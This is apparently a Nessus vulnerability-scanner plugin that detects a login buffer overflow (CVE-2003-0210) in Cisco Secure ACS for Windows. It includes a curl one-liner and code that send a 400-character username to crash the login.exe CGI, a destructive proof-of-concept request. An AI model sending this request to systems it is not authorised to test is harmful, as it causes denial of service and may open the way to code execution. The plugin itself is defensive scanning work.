CiscoSecure ACS for Windows CSAdmin Login Overflow DoS

#
# This script was written by Xue Yong Zhi <[email protected]>
# Rewritten by Tenable Network Security, Inc.
#
# See the Nessus Scripts License for details
#
# References:
# NSFOCUS SA2003-04
# curl -i "http://host:2002/login.exe?user=`perl -e "print ('a'x400)"`&reply=any&id=1"
########################

include("compat.inc");

if (description)
{
 script_id(11556);
 script_version("1.25");
 script_cvs_date("Date: 2018/07/06 11:26:08");

 script_cve_id("CVE-2003-0210");
 script_bugtraq_id(7413);
 script_xref(name:"CERT", value:"697049");
 script_xref(name:"NSFOCUS", value:"SA2003-04");

 script_name(english:"CiscoSecure ACS for Windows CSAdmin Login Overflow DoS");
 script_summary(english:"CISCO Secure ACS Management Interface Login Overflow");

 script_set_attribute(attribute:"synopsis", value:"Arbitrary code may be executed on the remote host.");
 script_set_attribute(attribute:"description", value:
"The remote web server crashed when the 'login.exe' CGI received a too
login query string. This leads to a denial of service or even
execution of arbitrary code. Some versions of Cisco Secure ACS web
server are known to be vulnerable to this flaw.");
 # https://web.archive.org/web/20030425095257/http://www.cisco.com/warp/public/707/cisco-sa-20030423-ACS.shtml
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9a387006");
 script_set_attribute(attribute:"solution", value:"Install ACS for Windows versions 3.0.4, 3.1.2, or later");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"2003/04/23");
 script_set_attribute(attribute:"patch_publication_date", value:"2003/04/23");
 script_set_attribute(attribute:"plugin_publication_date", value:"2003/04/30");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:secure_access_control_server");
 script_end_attributes();

 script_category(ACT_DESTRUCTIVE_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2003-2018 Xue Yong Zhi & Tenable Network Security, Inc.");
 script_family(english:"Web Servers");

 script_dependencie("http_version.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/www", 2002);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

function test(port)
{
  local_var	r;
  if ( http_is_dead(port:port) ||
       # http_is_broken(port: port)||
       ! is_cgi_installed3(item: "/login.exe", port: port))
     return 0;
  r = http_send_recv3(port: port, method: "GET", item: strcat("/login.exe?user=", crap(400), "&reply=any&id=1"));
  if (isnull(r)) return NULL;
  if (http_is_dead(port: port, retry:3))
  {
    security_hole(port);
    return 1;
  }
}

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default: 2002, embedded: 1);
test(port: port);